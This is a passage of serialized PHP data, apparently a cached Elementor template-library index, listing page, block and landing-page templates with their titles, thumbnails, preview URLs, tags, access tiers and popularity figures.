Soon\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Ceramics-Shop.jpg\";s:12:\"tmpl_created\";i:1650988949;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/ceramics-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:115:\"[\"Art\",\"Business\",\"Coming Soon\",\"Creative\",\"Decor\",\"Design\",\"Furniture Design\",\"Interior Design\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:290;a:21:{s:4:\"tmpl\";i:557;s:2:\"id\";i:6135;s:5:\"title\";s:8:\"About 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_2.png\";s:12:\"tmpl_created\";i:1520443663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:77;s:11:\"trend_index\";i:47;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:291;a:21:{s:4:\"tmpl\";i:1412;s:2:\"id\";i:24033;s:5:\"title\";s:37:\"Dance Studio &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Dance-Studio.jpg\";s:12:\"tmpl_created\";i:1649881344;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/dance-studio-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:113:\"[\"Academy\",\"Business\",\"Dance Studio\",\"Form\",\"Pilates\",\"School\",\"Sport\",\"Teacher\",\"Training\",\"Under Construction\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:292;a:21:{s:4:\"tmpl\";i:1190;s:2:\"id\";i:18568;s:5:\"title\";s:32:\"Flower Delivery &#8211; Business\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/04/Flower-Delivery.png\";s:12:\"tmpl_created\";i:1617546716;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/flower-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:37:\"[\"Delivery\",\"Flower\",\"Landing Pages\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:874;s:11:\"trend_index\";i:763;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:293;a:21:{s:4:\"tmpl\";i:1145;s:2:\"id\";i:16917;s:5:\"title\";s:22:\"Webinar &#8211; Events\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/01/Webinar-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610466822;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/lp/webinar-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:36:\"[\"Events\",\"Landing Pages\",\"Webinar\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:821;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:294;a:21:{s:4:\"tmpl\";i:1413;s:2:\"id\";i:24049;s:5:\"title\";s:33:\"ECO Shop &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-ECO-Shop.jpg\";s:12:\"tmpl_created\";i:1649882053;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/eco-shop-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:110:\"[\"Aesthetic\",\"Business\",\"Creative\",\"Decor\",\"Health\",\"Help\",\"Lifestyle\",\"Products\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:295;a:21:{s:4:\"tmpl\";i:497;s:2:\"id\";i:5397;s:5:\"title\";s:8:\"About 11\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1.png\";s:12:\"tmpl_created\";i:1520443503;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:148;s:11:\"trend_index\";i:43;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:296;a:21:{s:4:\"tmpl\";i:1154;s:2:\"id\";i:17079;s:5:\"title\";s:42:\"Calls Volunteer &#8211; Social Involvement\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/01/Calls-Volunteer.png\";s:12:\"tmpl_created\";i:1610631774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/calls-volunteer-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:68:\"[\"Care\",\"Covid-19\",\"Help\",\"Involvement\",\"Landing Pages\",\"Volunteer\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:854;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:297;a:21:{s:4:\"tmpl\";i:1419;s:2:\"id\";i:24136;s:5:\"title\";s:29:\"Food Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Food-Blog.jpg\";s:12:\"tmpl_created\";i:1650990034;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/food-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:62:\"[\"Blog\",\"Business\",\"Coming Soon\",\"Cooking\",\"Education\",\"Food\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:298;a:21:{s:4:\"tmpl\";i:1142;s:2:\"id\";i:16836;s:5:\"title\";s:33:\"Marketing Agency &#8211; Business\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/01/Marketing-Agency-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610464490;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/marketing-agency-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:74:\"[\"Agency\",\"Business\",\"Landing Pages\",\"Marketing\",\"Marketing Landing Page\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:816;s:11:\"trend_index\";i:787;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:299;a:21:{s:4:\"tmpl\";i:1411;s:2:\"id\";i:24020;s:5:\"title\";s:35:\"Mobile App &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Mobile-App.jpg\";s:12:\"tmpl_created\";i:1649880955;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/mobile-app-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:77:\"[\"App\",\"Business\",\"Coding\",\"Computer\",\"Launch\",\"Mobile\",\"Under Construction\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:300;a:21:{s:4:\"tmpl\";i:498;s:2:\"id\";i:5405;s:5:\"title\";s:8:\"About 12\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1.png\";s:12:\"tmpl_created\";i:1520443505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:216;s:11:\"trend_index\";i:50;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:301;a:21:{s:4:\"tmpl\";i:1139;s:2:\"id\";i:16785;s:5:\"title\";s:42:\"Gym Promotion &#8211; Health &amp; Fitness\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2021/01/Gym-LP.jpg\";s:12:\"tmpl_created\";i:1610455496;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/gym-promotion-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:42:\"[\"Fitness\",\"Gym\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:820;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:302;a:21:{s:4:\"tmpl\";i:1420;s:2:\"id\";i:24152;s:5:\"title\";s:32:\"Perfume Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Perfume-Shop.jpg\";s:12:\"tmpl_created\";i:1650990353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/perfume-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:68:\"[\"Business\",\"Coming Soon\",\"Cosmetics\",\"Lifestyle\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:303;a:21:{s:4:\"tmpl\";i:1185;s:2:\"id\";i:18492;s:5:\"title\";s:34:\"Bicycle Pre-Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Bike-Landing-Page.png\";s:12:\"tmpl_created\";i:1617535552;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/bicycle-pre-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:34:\"[\"Bicycle\",\"Landing Pages\",\"Sale\"]\";s:10:\"menu_order\";i:50;s:16:\"popularity_index\";i:871;s:11:\"trend_index\";i:826;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:304;a:21:{s:4:\"tmpl\";i:1418;s:2:\"id\";i:24126;s:5:\"title\";s:28:\"Skincare &#8211; Coming Soon\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Skincare.jpg\";s:12:\"tmpl_created\";i:1650989585;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/skincare-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:128:\"[\"Aesthetic\",\"Beauty\",\"Beauty Salon\",\"Business\",\"Coming Soon\",\"Cosmetics\",\"Girly\",\"Lifestyle\",\"Services\",\"Skincare\",\"Treatment\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:305;a:21:{s:4:\"tmpl\";i:1181;s:2:\"id\";i:18349;s:5:\"title\";s:39:\"Virtual try-on glasses &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280-8.png\";s:12:\"tmpl_created\";i:1614772569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/lp/virtual-try-on-glasses-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:64:\"[\"Fashion\",\"Glasses\",\"Landing Pages\",\"Online Service\",\"Virtual\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:848;s:11:\"trend_index\";i:803;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:306;a:21:{s:4:\"tmpl\";i:500;s:2:\"id\";i:5421;s:5:\"title\";s:8:\"About 13\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_3.png\";s:12:\"tmpl_created\";i:1520443509;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:215;s:11:\"trend_index\";i:77;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:307;a:21:{s:4:\"tmpl\";i:513;s:2:\"id\";i:5533;s:5:\"title\";s:8:\"About 15\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_10.png\";s:12:\"tmpl_created\";i:1520443534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-15/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:21;s:11:\"trend_index\";i:57;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:308;a:21:{s:4:\"tmpl\";i:1410;s:2:\"id\";i:24004;s:5:\"title\";s:33:\"Skincare &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Skincare.jpg\";s:12:\"tmpl_created\";i:1649880534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/skincare-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:144:\"[\"Aesthetic\",\"Beauty\",\"Beauty Salon\",\"Business\",\"Cosmetics\",\"Girly\",\"Lifestyle\",\"Makeup\",\"Services\",\"Skincare\",\"Treatment\",\"Under Construction\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:309;a:21:{s:4:\"tmpl\";i:1172;s:2:\"id\";i:17458;s:5:\"title\";s:31:\"Moving Company &#8211; Business\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-Moving-Company.png\";s:12:\"tmpl_created\";i:1612727025;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/moving-company-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:46:\"[\"Business\",\"Landing Pages\",\"Movers\",\"Moving\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:826;s:11:\"trend_index\";i:767;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:310;a:21:{s:4:\"tmpl\";i:1415;s:2:\"id\";i:24092;s:5:\"title\";s:29:\"Vase Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Vase-Shop.jpg\";s:12:\"tmpl_created\";i:1650988613;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/vase-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:115:\"[\"Art\",\"Business\",\"Coming Soon\",\"Creative\",\"Decor\",\"Design\",\"Furniture Design\",\"Interior Design\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:53;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:311;a:21:{s:4:\"tmpl\";i:1186;s:2:\"id\";i:18517;s:5:\"title\";s:29:\"Food Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Food-Blog.png\";s:12:\"tmpl_created\";i:1617539897;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/food-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:45:\"[\"Blog\",\"Coming Soon\",\"Food\",\"Landing Pages\"]\";s:10:\"menu_order\";i:53;s:16:\"popularity_index\";i:844;s:11:\"trend_index\";i:672;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:312;a:21:{s:4:\"tmpl\";i:1167;s:2:\"id\";i:17379;s:5:\"title\";s:33:\"IT Service &#8211; Online Service\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-IT-Service.png\";s:12:\"tmpl_created\";i:1612713022;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/it-service-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:41:\"[\"IT\",\"Landing Pages\",\"Remote\",\"Support\"]\";s:10:\"menu_order\";i:54;s:16:\"popularity_index\";i:806;s:11:\"trend_index\";i:634;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:313;a:21:{s:4:\"tmpl\";i:1248;s:2:\"id\";i:22134;s:5:\"title\";s:32:\"Art Magazine &#8211; Coming Soon\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Art-Magazine-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1647176713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/art-magazine-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"Art\",\"Coming Soon\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:54;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:314;a:21:{s:4:\"tmpl\";i:512;s:2:\"id\";i:5525;s:5:\"title\";s:8:\"About 14\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_10.png\";s:12:\"tmpl_created\";i:1520443532;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:55;s:16:\"popularity_index\";i:9;s:11:\"trend_index\";i:29;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:315;a:21:{s:4:\"tmpl\";i:1189;s:2:\"id\";i:18560;s:5:\"title\";s:52:\"Finance Learning Platform &#8211; Under 